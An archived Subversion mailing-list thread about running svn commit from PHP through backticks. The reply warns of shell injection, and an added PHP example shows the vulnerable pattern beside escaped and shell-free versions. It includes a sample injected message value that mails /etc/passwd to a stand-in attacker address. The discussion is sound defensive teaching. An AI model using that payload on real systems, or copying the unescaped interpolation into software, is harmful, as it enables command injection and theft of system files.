
RE: PHP hack under way

From: Bryan Simmons <bznutz_is_king_at_yahoo.com>
Date: 2004-02-11 23:01:20 CET

But $message is created by the script, with no user input. It comes
from portal variables such as the current user and location in the
portal. Also, the apache2 server is running as the svn user who can
only access things in ~/ and /usr/local/apache2/htdocs.

Regards,

Bryan Simmons

-----Original Message-----
From: Brian W. Fitzpatrick [mailto:fitz@red-bean.com]
Sent: Wednesday, February 11, 2004 4:56 PM
To: Simmons, Bryan
Cc: users@subversion.tigris.org
Subject: Re: PHP hack under way

On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
> Ok, so I went ahead and took the easiest approach I could: svn client
> commands in php. The kinks have not all been worked out for my php
> portal but I did find a way to successfully push revisions to
> subversion through php.
>
> I use the backtick operator. Yep, it's that simple.
>
> $response = `svn commit -m \"$message\"`;
>
> I have found that the $response is dead-on accurate in this case
> despite warnings that the command line response may be garbled into
> binary.
>
> Here's a question: will svn add && svn commit work?

I don't know offhand, but I suspect that you may be opening up a
security hole the size of Texas by doing this. What if message is
actually equal to

"foo\" ; mail evilhaxor@example.com < /etc/passwd"

or something worse.

Just a little something to think about.

-Fitz

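The backtick pattern Fitz objects to, next to two ways of building the same commit command so that the message is passed as one literal argument. This is an added example, not code from the thread; it assumes a checked-out working copy in `$cwd` and an `svn` binary on PATH.

```php
<?php
// Added example, not from the thread. Shows why interpolating $message into
// a shell command is dangerous and how to pass it as a single argument.

// The pattern from the thread: $message is interpolated straight into the
// shell string, so any shell metacharacter in it (";", "`", "$(...)") is
// parsed by the shell, not handed to svn.
function unsafeCommitCommand(string $message): string {
    return "svn commit -m \"$message\"";
}

// Hardened form for cases where the shell is still used: escapeshellarg()
// single-quotes the value and escapes embedded single quotes, so the whole
// message reaches svn as one argv entry regardless of its contents.
function safeCommitCommand(string $message): string {
    return 'svn commit -m ' . escapeshellarg($message);
}

// Better still: skip the shell entirely. proc_open() with an array command
// (PHP >= 7.4) execs svn directly, so no metacharacters are ever parsed.
function commitWithoutShell(string $message, string $cwd): array {
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['svn', 'commit', '-m', $message], $spec, $pipes, $cwd);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start svn');
    }
    $out = stream_get_contents($pipes[1]);
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $status = proc_close($proc);
    return ['status' => $status, 'stdout' => $out, 'stderr' => $err];
}

// Constructed sample input: the message Fitz used as his example. Printing
// the two command strings side by side shows the difference: the unsafe
// form ends the quoted argument at the embedded '"' and continues with the
// rest as a second shell command; the escaped form keeps it all in one
// single-quoted argument.
$message = 'foo" ; mail evilhaxor@example.com < /etc/passwd';
echo unsafeCommitCommand($message), PHP_EOL;
echo safeCommitCommand($message), PHP_EOL;
```

A message assembled from the portal's current user name or location is still attacker-influenced if any of those values can be chosen by a user, so the argument-passing fix applies even when the script never reads a form field directly.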

Received on Wed Feb 11 23:01:42 2004

This is an archived mail posted to the Subversion Users mailing list.
